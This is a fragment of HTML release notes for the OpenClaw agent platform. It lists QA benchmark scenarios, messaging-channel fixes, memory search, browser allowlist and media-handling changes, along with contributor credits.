<li>QA-Lab: schedule a live-frontier Codex-vs-Pi runtime token-efficiency artifact lane in the all-lanes QA workflow. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415101470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80175/hovercard" href="https://github.com/openclaw/openclaw/issues/80175">#80175</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: hard-gate required OpenClaw dynamic runtime-tool drift in the standard Codex-vs-Pi tier with a blocking release-check verifier and publish the tool coverage report artifact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416189394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80339/hovercard" href="https://github.com/openclaw/openclaw/issues/80339">#80339</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416028202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80319/hovercard" href="https://github.com/openclaw/openclaw/issues/80319">#80319</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add the personal-agent approval-denial scenario so the benchmark pack verifies denied local reads stop cleanly without tool progress or fixture leaks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463922408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83150" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83150/hovercard" href="https://github.com/openclaw/openclaw/pull/83150">#83150</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>QA-Lab: extend the personal-agent benchmark pack with a local task followthrough scenario for proof-backed pending, blocked, and done status reporting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>QA-Lab: add a report-only dreaming shadow-trial scenario so candidate memory promotion can be evaluated without mutating <code>MEMORY.md</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>Gateway/performance: add <code>pnpm test:restart:gateway</code> benchmark tooling for repeated restart readiness, downtime, trace, and resource-slope evidence. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465177384" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83299" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83299/hovercard" href="https://github.com/openclaw/openclaw/pull/83299">#83299</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Android: switch Talk Mode to realtime Gateway relay voice sessions with streaming mic input, realtime audio playback, tool-result bridging, and on-screen transcripts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463811067" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83130" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83130/hovercard" href="https://github.com/openclaw/openclaw/pull/83130">#83130</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sliekens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sliekens">@sliekens</a>.</li>
<li>Gateway/config: expose config lookup reload metadata so tools can distinguish restart-required, hot-reloadable, and no-op fields before applying config edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4438060145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81409/hovercard" href="https://github.com/openclaw/openclaw/issues/81409">#81409</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4442609432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81612" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81612/hovercard" href="https://github.com/openclaw/openclaw/pull/81612">#81612</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Telegram: add allowlisted native DM draft previews for transient tool progress while keeping final answers on the normal persistent delivery path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469802375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83622" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83622/hovercard" href="https://github.com/openclaw/openclaw/pull/83622">#83622</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akrimm702/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akrimm702">@akrimm702</a>.</li>
<li>QA-Lab: add a personal-agent share-safe diagnostics artifact scenario so support handoffs keep useful status while omitting raw personal content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Memory/search: scan the JS-side fallback vector path (used when the sqlite-vec index is unavailable or has a mismatched dimension) in bounded rowid batches and yield to the event loop between batches so large chunk tables can no longer pin the Node.js main thread for multi-second windows. Also keeps the SQL prepared statement rooted in a local so node:sqlite cannot finalize it mid-scan under heap pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432718295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81172" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81172/hovercard" href="https://github.com/openclaw/openclaw/issues/81172">#81172</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dev23xyz-oss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dev23xyz-oss">@dev23xyz-oss</a>.</li>
<li>CLI/update: bypass npm freshness filters consistently during managed package and plugin installs so freshly published release plugins remain installable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Agents/subagents: keep collect-mode announce queues batching unresolved-origin items with compatible same-route messages and resume collection after a true cross-channel drain when a later compatible batch remains. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468716265" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83577" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83577/hovercard" href="https://github.com/openclaw/openclaw/issues/83577">#83577</a>.</li>
<li>Providers/Anthropic: preserve native image input for current Claude model rows when stale local catalog data marks them text-only. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472508905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83756" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83756/hovercard" href="https://github.com/openclaw/openclaw/pull/83756">#83756</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Control UI: render live tool progress from session-scoped <code>session.tool</code> Gateway events so externally started runs show their tool cards in the active session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4471865132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83734" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83734/hovercard" href="https://github.com/openclaw/openclaw/pull/83734">#83734</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Outbound: resolve send-capable channel plugins from the active runtime registry when the pinned startup registry only has setup metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4471864947" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83733" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83733/hovercard" href="https://github.com/openclaw/openclaw/pull/83733">#83733</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Browser: enforce current-tab URL allowlist checks for <code>/act</code> evaluate/batch actions and <code>/highlight</code> routes while leaving tab-management actions unblocked. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392533668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78523" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78523/hovercard" href="https://github.com/openclaw/openclaw/pull/78523">#78523</a>)</li>
<li>CI: require real-behavior-proof verdict markers to come from the ClawSweeper GitHub App before accepting exact-head proof. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470892805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83692/hovercard" href="https://github.com/openclaw/openclaw/pull/83692">#83692</a>)</li>
<li>Models: show the effective OpenAI/Codex auth profile in <code>/models</code> provider headers instead of falling back to the OpenAI env-key label. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470946100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83697" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83697/hovercard" href="https://github.com/openclaw/openclaw/pull/83697">#83697</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yu-xin-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yu-xin-c">@yu-xin-c</a>.</li>
<li>Browser: keep a profile <code>cdpPort</code> when its <code>cdpUrl</code> omits a port, while still letting explicitly written URL ports win. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454473920" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82166" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82166/hovercard" href="https://github.com/openclaw/openclaw/pull/82166">#82166</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Agents/image generation: allow distinct <code>image_generate</code> prompts to start separate session-backed background tasks while same-prompt retries still return the active task status. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469561038" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83614/hovercard" href="https://github.com/openclaw/openclaw/pull/83614">#83614</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Elarwei001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Elarwei001">@Elarwei001</a>.</li>
<li>Gateway/WebChat: honor configured <code>channels.webchat.textChunkLimit</code> and <code>chunkMode</code> overrides when chunking WebChat replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4471165614" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83713" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83713/hovercard" href="https://github.com/openclaw/openclaw/pull/83713">#83713</a>)</li>
<li>Control UI: stop the chat reading indicator from sticking after an assistant response finishes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467410605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83515/hovercard" href="https://github.com/openclaw/openclaw/pull/83515">#83515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/njuboy11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/njuboy11">@njuboy11</a>.</li>
<li>Skills: reject empty or whitespace-only skill names and descriptions during quick validation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992930563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27061" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/27061/hovercard" href="https://github.com/openclaw/openclaw/pull/27061">#27061</a>)</li>
<li>Sessions: skip trailing custom transcript entries when checking tail assistant replies so embedded CLI gap-fill does not duplicate canonical assistant output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469910900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83635" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83635/hovercard" href="https://github.com/openclaw/openclaw/pull/83635">#83635</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yaoyi1222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yaoyi1222">@yaoyi1222</a>.</li>
<li>Memory Wiki: keep <code>wiki_lint</code> tool output path-safe by reporting vault-internal lint reports as relative paths in tool text and details while preserving absolute report paths for CLI/file callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466350048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83439" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83439/hovercard" href="https://github.com/openclaw/openclaw/pull/83439">#83439</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Telegram: keep verbose tool progress visible without mirroring non-final progress into active session transcripts, preventing embedded provider replies from aborting mid-run. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469858032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83631" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83631/hovercard" href="https://github.com/openclaw/openclaw/pull/83631">#83631</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kurplunkin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kurplunkin">@kurplunkin</a>.</li>
<li>Telegram: log successful outbound text and media deliveries with account, chat, message, operation, thread, reply, silent, and chunk metadata while keeping message bodies out of logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464232340" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83196/hovercard" href="https://github.com/openclaw/openclaw/issues/83196">#83196</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464712841" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83247" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83247/hovercard" href="https://github.com/openclaw/openclaw/pull/83247">#83247</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jrwrest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jrwrest">@jrwrest</a>.</li>
<li>Cron: link isolated scheduled task runs to their stable cron session so task status and cleanup can follow the backing agent run. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469405023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83606/hovercard" href="https://github.com/openclaw/openclaw/pull/83606">#83606</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jai">@jai</a>.</li>
<li>CLI: enforce the documented Node.js 22.19 runtime floor in the source launcher.</li>
<li>Release stability: repair broad-gate regressions in requester-agent completion handoff, QA-Lab mock spawn attribution, Slack monitor test isolation, plugin uninstall peer fixtures, and Node-floor launcher contract coverage.</li>
<li>Agents/replies: persist queued follow-up user messages and assistant error stubs only once across model-fallback retries, preventing repeated provider rejections from corrupted same-role session transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465972914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83404/hovercard" href="https://github.com/openclaw/openclaw/issues/83404">#83404</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466078721" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83417" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83417/hovercard" href="https://github.com/openclaw/openclaw/pull/83417">#83417</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>Slack: persist delivered inbound message IDs and fail closed when same-channel thread replies lose their thread context, preventing delayed duplicate replies and accidental channel-root posts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467465571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83521" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83521/hovercard" href="https://github.com/openclaw/openclaw/issues/83521">#83521</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannon0430/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannon0430">@shannon0430</a>.</li>
<li>Codex app-server: complete OpenClaw dynamic tool diagnostics at the request boundary so successful, failed, timed out, aborted, and blocked tool calls do not leave active tool state behind. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466827129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83474/hovercard" href="https://github.com/openclaw/openclaw/issues/83474">#83474</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rozmiarD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rozmiarD">@rozmiarD</a>.</li>
<li>Gateway/config: keep config writes from failing on unrelated unresolved auth-profile SecretRefs while preserving live auth-profile runtime snapshots.</li>
<li>Gateway/sessions: clear stored CLI provider resume bindings on non-subagent <code>/reset</code> so the next turn starts a fresh provider-side CLI conversation instead of resuming old context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466450765" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83448/hovercard" href="https://github.com/openclaw/openclaw/pull/83448">#83448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasonyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasonyliu">@jasonyliu</a>.</li>
<li>Doctor: preserve legacy whole-agent Claude CLI intent by moving matching Anthropic model selections to model-scoped runtime policy before removing stale runtime pins. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467068699" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83491/hovercard" href="https://github.com/openclaw/openclaw/issues/83491">#83491</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danielcrick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danielcrick">@danielcrick</a>.</li>
<li>Discord/OpenAI: keep realtime Discord voice sessions hearing follow-up turns with OpenAI realtime and prebuffer assistant playback to avoid choppy starts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4417674952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80505/hovercard" href="https://github.com/openclaw/openclaw/pull/80505">#80505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>LM Studio: resolve env-template API keys like <code>${LMSTUDIO_API_KEY}</code> through the standard SecretInput path instead of sending the raw template as the bearer token, and preserve header-auth and discovery-key precedence when the template is unset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4417527708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80495" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80495/hovercard" href="https://github.com/openclaw/openclaw/issues/80495">#80495</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4418547191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80568" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80568/hovercard" href="https://github.com/openclaw/openclaw/pull/80568">#80568</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MonkeyLeeT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MonkeyLeeT">@MonkeyLeeT</a>.</li>
<li>Discord/subagents: route the initial reply from thread-bound delegated sessions into the bound Discord thread instead of the parent channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464042454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83170" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83170/hovercard" href="https://github.com/openclaw/openclaw/issues/83170">#83170</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464046468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83172" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83172/hovercard" href="https://github.com/openclaw/openclaw/pull/83172">#83172</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>.</li>
<li>Gateway/sessions: rotate failed agent sessions when their transcript file is missing instead of wedging per-channel lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467000680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83488" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83488/hovercard" href="https://github.com/openclaw/openclaw/issues/83488">#83488</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468120214" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83553" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83553/hovercard" href="https://github.com/openclaw/openclaw/pull/83553">#83553</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Media: prevent image metadata probing from invoking external decoder delegates on unrecognized image bytes, and stop fallback chaining after real processing errors.</li>
<li>Media: install Sharp with the root package and fall back to sips, Windows native imaging, ImageMagick, GraphicsMagick, or ffmpeg for image resizing/conversion when Sharp is unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465939099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83401" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83401/hovercard" href="https://github.com/openclaw/openclaw/issues/83401">#83401</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scotthuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scotthuang">@scotthuang</a>.</li>
<li>Telegram: deliver generated media completions back into forum topics by preserving topic IDs across requester-agent handoff. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468244035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83556/hovercard" href="https://github.com/openclaw/openclaw/pull/83556">#83556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Gateway: defer update-check startup until after readiness so package update checks no longer block sidecar-ready startup, while preserving update broadcasts and shutdown cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467462415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83520" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83520/hovercard" href="https://github.com/openclaw/openclaw/pull/83520">#83520</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Telegram: keep <code>/btw</code> and read-only status commands from aborting active runs, and avoid retaining raw update payloads in timed-out spool tombstones. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464995305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83272" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83272/hovercard" href="https://github.com/openclaw/openclaw/issues/83272">#83272</a>.</li>
<li>Agents: log strict-agentic execution contract diagnostics only when the planning-only retry path actually triggers.</li>
<li>Agents: stop embedded session takeover and session write-lock errors from consuming model fallbacks while preserving provider fallback metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467367566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83510" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83510/hovercard" href="https://github.com/openclaw/openclaw/issues/83510">#83510</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>.</li>
<li>Agents/video: hide <code>video_generate</code> reference-audio parameters unless a registered video provider supports audio inputs.</li>
<li>Plugins: fall back to npm for official ClawHub updates when artifact downloads are unavailable, including beta-to-default fallback and dry-run version reporting.</li>
<li>Plugins/xAI: echo PKCE challenge fields during OAuth authorization-code token exchange for xAI token-endpoint compatibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467208552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83499/hovercard" href="https://github.com/openclaw/openclaw/pull/83499">#83499</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Codex app-server: hydrate current inbound image attachments before queued runs so Responses-backed agents receive Discord and other channel images as native vision input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466691440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83466" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83466/hovercard" href="https://github.com/openclaw/openclaw/issues/83466">#83466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iannwu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iannwu">@iannwu</a>.</li>
